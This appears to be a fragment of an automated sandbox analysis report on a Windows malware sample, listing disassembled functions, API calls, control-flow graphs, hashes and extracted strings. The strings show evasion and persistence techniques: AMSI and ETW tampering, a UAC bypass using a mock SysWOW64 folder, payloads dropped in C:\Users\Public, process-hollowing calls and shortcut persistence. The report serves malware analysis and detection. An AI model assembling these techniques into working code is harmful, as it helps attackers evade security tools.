                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC42
                                                                                                                • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC61
                                                                                                                  • Part of subcall function 02EC4C60: SysFreeString.OLEAUT32(02EDF4A4), ref: 02EC4C6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                • String ID:
                                                                                                                • API String ID: 1530111750-0
                                                                                                                • Opcode ID: 9d4d79fe31508ce4948b34e56172dbc07a05a0858cd57177c49ec9c08f4fe183
                                                                                                                • Instruction ID: 33fe399cc402b8ce65815876507e000a6fd085787739440d83b1fad717e30dad
                                                                                                                • Opcode Fuzzy Hash: 9d4d79fe31508ce4948b34e56172dbc07a05a0858cd57177c49ec9c08f4fe183
                                                                                                                • Instruction Fuzzy Hash: 5A01447298020CBEEB11EBE0DD52FDDB3BDEB48704F6194A1F201E2180EA756B058A64
                                                                                                                Function 02ED6DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02ED6DB9,?,?,?,00000000), ref: 02ED6D99
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,02ED6EAC,00000000,00000000,02ED6E2B,?,00000000,02ED6E9B), ref: 02ED6E17
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromInstanceProg
                                                                                                                • String ID:
                                                                                                                • API String ID: 2151042543-0
                                                                                                                • Opcode ID: 1374830f9540c0c83a530e0f4776662bee51fe2b9344e3735d2fcb50f931f115
                                                                                                                • Instruction ID: 1d706c6e674eed84fba3bf28a8e22425a6629db61b7ceaee06480cc97c359a24
                                                                                                                • Opcode Fuzzy Hash: 1374830f9540c0c83a530e0f4776662bee51fe2b9344e3735d2fcb50f931f115
                                                                                                                • Instruction Fuzzy Hash: 16012B712887046EF711EFB1EC2286F7BBDE749B00F619839F805E2680E6309A12C860
                                                                                                                Function 02EE8128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4574 2ee8128-2ee8517 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec48ec 4689 2ee851d-2ee86f0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec47ec call 2ec49a0 call 2ec4d74 call 2ec4df0 CreateProcessAsUserW 4574->4689 4690 2ee93a1-2ee9524 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec48ec 4574->4690 4799 2ee876e-2ee8879 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 4689->4799 4800 2ee86f2-2ee8769 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 4689->4800 4779 2ee952a-2ee9539 call 2ec48ec 4690->4779 4780 2ee9cf5-2eeb2fa call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 * 16 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ec46d4 * 2 call 2ed89d0 call 2ed7c10 call 2ed8338 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 ExitProcess 4690->4780 4779->4780 4788 2ee953f-2ee9812 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2edf094 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec7e5c 4779->4788 5046 2ee9aef-2ee9cf0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec49f8 call 2ed8d70 4788->5046 5047 2ee9818-2ee9aea call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ede358 call 2ec4530 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4de0 * 2 call 2ec4764 call 2eddc8c 4788->5047 4900 2ee887b-2ee887e 4799->4900 4901 2ee8880-2ee8ba0 call 2ec49f8 call 2edde50 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2edd164 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 4799->4901 4800->4799 4900->4901 5217 2ee8bb9-2ee939c call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 ResumeThread call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 CloseHandle call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ed8080 call 2ed894c * 6 CloseHandle call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 call 2ec4860 call 2ec49a0 call 2ec46d4 call 2ec47ec call 2ec49a0 call 2ec46d4 call 2ed89d0 4901->5217 5218 2ee8ba2-2ee8bb4 call 2ed8730 4901->5218 5046->4780 5047->5046 5217->4690 5218->5217
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0303B7E0,0303B824,OpenSession,02F47380,02EEB7B8,UacScan,02F47380), ref: 02EE86E9
                                                                                                                • ResumeThread.KERNEL32(00000000,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8), ref: 02EE8D33
                                                                                                                • CloseHandle.KERNEL32(00000000,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,00000000,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380), ref: 02EE8EB2
                                                                                                                  • Part of subcall function 02ED894C: LoadLibraryW.KERNEL32(bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,UacScan), ref: 02ED8960
                                                                                                                  • Part of subcall function 02ED894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02ED897A
                                                                                                                  • Part of subcall function 02ED894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize), ref: 02ED89B6
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02F47380,02EEB7B8,UacInitialize,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacScan,02F47380), ref: 02EE92A4
                                                                                                                  • Part of subcall function 02EC7E5C: GetFileAttributesA.KERNEL32(00000000,?,02EE041F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,UacInitialize), ref: 02EC7E67
                                                                                                                  • Part of subcall function 02EDDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02EDDD5E), ref: 02EDDCCB
                                                                                                                  • Part of subcall function 02EDDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02EDDD05
                                                                                                                  • Part of subcall function 02EDDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02EDDD32
                                                                                                                  • Part of subcall function 02EDDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02EDDD3B
                                                                                                                  • Part of subcall function 02ED8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02ED83C2), ref: 02ED83A4
                                                                                                                • ExitProcess.KERNEL32(00000000,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,Initialize,02F47380,02EEB7B8,00000000,00000000,00000000,ScanString,02F47380,02EEB7B8), ref: 02EEB2FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                • API String ID: 2769005614-3738268246
                                                                                                                • Opcode ID: 2ef9e99eeab4afd7884e8506bfb4c4fa7dae704a9dcfc0d2f0db787685e7f4ef
                                                                                                                • Instruction ID: fea7be8752867c75eb92c521099f37816e0974721bacb4c48d84c3f1212c6c3a
                                                                                                                • Opcode Fuzzy Hash: 2ef9e99eeab4afd7884e8506bfb4c4fa7dae704a9dcfc0d2f0db787685e7f4ef
                                                                                                                • Instruction Fuzzy Hash: 27430D39A8411D8BCB11FBA4DD919CE73FAFB85304F60E1A9F4099B654DA30AE52CF41
                                                                                                                Function 02EE3E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                  • Part of subcall function 02EDDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02EDDD5E), ref: 02EDDCCB
                                                                                                                  • Part of subcall function 02EDDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02EDDD05
                                                                                                                  • Part of subcall function 02EDDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02EDDD32
                                                                                                                  • Part of subcall function 02EDDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02EDDD3B
                                                                                                                • Sleep.KERNEL32(000003E8,ScanBuffer,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,02EEBB30,00000000,00000000,02EEBB24,00000000,00000000), ref: 02EE40CB
                                                                                                                  • Part of subcall function 02ED88B8: LoadLibraryW.KERNEL32(amsi), ref: 02ED88C1
                                                                                                                  • Part of subcall function 02ED88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02ED8920
                                                                                                                • Sleep.KERNEL32(000003E8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,000003E8,ScanBuffer,02F47380,02EEB7B8,UacScan,02F47380), ref: 02EE4277
                                                                                                                  • Part of subcall function 02ED894C: LoadLibraryW.KERNEL32(bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,UacScan), ref: 02ED8960
                                                                                                                  • Part of subcall function 02ED894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02ED897A
                                                                                                                  • Part of subcall function 02ED894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize), ref: 02ED89B6
                                                                                                                • Sleep.KERNEL32(00004E20,UacScan,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacInitialize,02F47380,02EEB7B8), ref: 02EE50EE
                                                                                                                  • Part of subcall function 02EDDC04: RtlI.N(?,?,00000000,02EDDC7E), ref: 02EDDC2C
                                                                                                                  • Part of subcall function 02EDDC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC42
                                                                                                                  • Part of subcall function 02EDDC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC61
                                                                                                                  • Part of subcall function 02EC7E5C: GetFileAttributesA.KERNEL32(00000000,?,02EE041F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,UacInitialize), ref: 02EC7E67
                                                                                                                  • Part of subcall function 02ED85BC: WinExec.KERNEL32(?,?), ref: 02ED8624
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                • API String ID: 2171786310-3926298568
                                                                                                                • Opcode ID: c1d8e770f5ed3054a47ed7f6b066b1e9969a9151c54fc4ed4843f2c0cb44f558
                                                                                                                • Instruction ID: e5b776b8a6ca40f9110cfdbdd66cda61f2756d50c13c2934cb640b85c606ee82
                                                                                                                • Opcode Fuzzy Hash: c1d8e770f5ed3054a47ed7f6b066b1e9969a9151c54fc4ed4843f2c0cb44f558
                                                                                                                • Instruction Fuzzy Hash: 5B434C34B8015D8BDB11FBA4DD91ACE73FAFB85304F60A1A9B409A7654DB30AE52CF41
                                                                                                                Function 02EDE678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
